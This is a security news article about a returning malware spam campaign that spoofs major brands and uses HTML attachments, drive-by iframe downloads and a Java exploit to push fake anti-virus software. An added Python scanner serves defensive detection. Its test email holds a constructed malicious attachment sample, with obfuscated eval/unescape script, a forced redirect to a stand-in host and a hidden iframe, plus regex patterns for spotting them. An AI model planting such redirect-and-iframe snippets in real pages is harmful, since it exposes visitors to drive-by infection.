Aggressive plug-and-play malware campaign returns

In addition to hijacked email addresses, the spammers spoof major brands, such as Amazon, eBay, Facebook, and WordPress. St. Bernard said it has blocked more than eight million PNP malware messages since the middle of last week.

"Like the global 'Here you have...' spam campaign from earlier this month, this new round of PNP spam is virulent and relies on social engineering to get users to click on a link or open an attachment, but that is where the similarities end. The PNP spam is much more sophisticated and more dangerous than the 'Here You Have...' campaign, which did not cause any harm to computers. From a single click on a link in the PNP email message, multiple exploits can silently infect a computer system in a matter of seconds," warned Mary Mizrahi, product manager at St. Bernard.

Those behind the PNP malware campaigns are changing their methods to bypass filters and convince users to click on links or open email attachments. They also appear to have switched from using their own obfuscation techniques for JavaScript that is sent through email to using commercially available tools like AntsSoft HTML Protector, which is designed to prevent certain actions on web pages such as right-clicking.

If a recipient opens the HTML attachment in the emails, the embedded JavaScript causes the browser to navigate to the compromised host, which then performs a drive-by download (using an iframe) of more JavaScript, according to St. Bernard. The additional script attempts several exploits and shuttles the browser to another fake anti-virus site, similar to the sites reported in August 2010.
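As an added example (not code from St. Bernard or this article), the script below shows how a mail gateway or analyst could flag HTML attachments carrying the pattern described above: embedded script that redirects the browser and plants a hidden iframe. The sample message, the .invalid domain and the indicator patterns are constructed for illustration.

```python
import re
from email import message_from_string
from email.message import Message

# Constructed sample: a multipart message whose HTML attachment contains
# obfuscated script, a forced redirect and a 1x1 hidden iframe.
SAMPLE_EMAIL = """\
From: orders@example.com
To: recipient@example.net
Subject: Your order
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="b1"

--b1
Content-Type: text/plain

Please see the attached invoice.
--b1
Content-Type: text/html; name="invoice.html"
Content-Disposition: attachment; filename="invoice.html"

<html><body>
<script>eval(unescape("%64%6f%63%75%6d%65%6e%74"));
window.location="http://compromised.invalid/in.php";</script>
<iframe src="http://compromised.invalid/x" width="1" height="1"></iframe>
</body></html>
--b1--
"""

# Heuristic indicators (constructed); tune thresholds for real traffic.
INDICATORS = {
    "redirect": re.compile(r"(window|document)\.location\s*=", re.I),
    "eval_unescape": re.compile(r"\b(eval|unescape)\s*\(", re.I),
    "hidden_iframe": re.compile(r'<iframe[^>]*(width="?[01]"?|height="?[01]"?|visibility\s*:\s*hidden)', re.I),
}

def html_attachments(msg: Message):
    """Yield (filename, body) for every attached text/html part."""
    for part in msg.walk():
        if part.get_content_type() == "text/html" and part.get_filename():
            yield part.get_filename(), part.get_payload(decode=True).decode("utf-8", "replace")

def scan_message(raw: str) -> dict:
    """Return {attachment filename: [matched indicator names]}."""
    findings = {}
    for name, body in html_attachments(message_from_string(raw)):
        findings[name] = [label for label, rx in INDICATORS.items() if rx.search(body)]
    return findings

if __name__ == "__main__":
    print(scan_message(SAMPLE_EMAIL))
```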

The JavaScript obfuscation technique for the downloader component has been revamped and is attempting to exploit CVE-2010-0886, a vulnerability in the Java Development Toolkit, as well as pulling down several other virulent components, including "installer_m.exe," "flash.swf" and "libtiff.pdf."

St. Bernard said that a VirusTotal scan of the multiple malicious components contained in the downloader found that none of the anti-virus engines had detected installer_m.exe, 12 had identified flash.swf as a Trojan, and five had detected libtiff.pdf.

A posting on the St. Bernard Security Alerts blog noted:

One way or another, this technique has its roots extending back about a year now, so I think it’s safe to say that it is a relatively permanent feature of spam going forward, as I initially speculated earlier in the year. The one thing that could change its permanence is if browsers get very good at detecting/blocking this technique. Google’s Safe Browsing, for example, has made great strides in this realm compared to the beginning of the year.
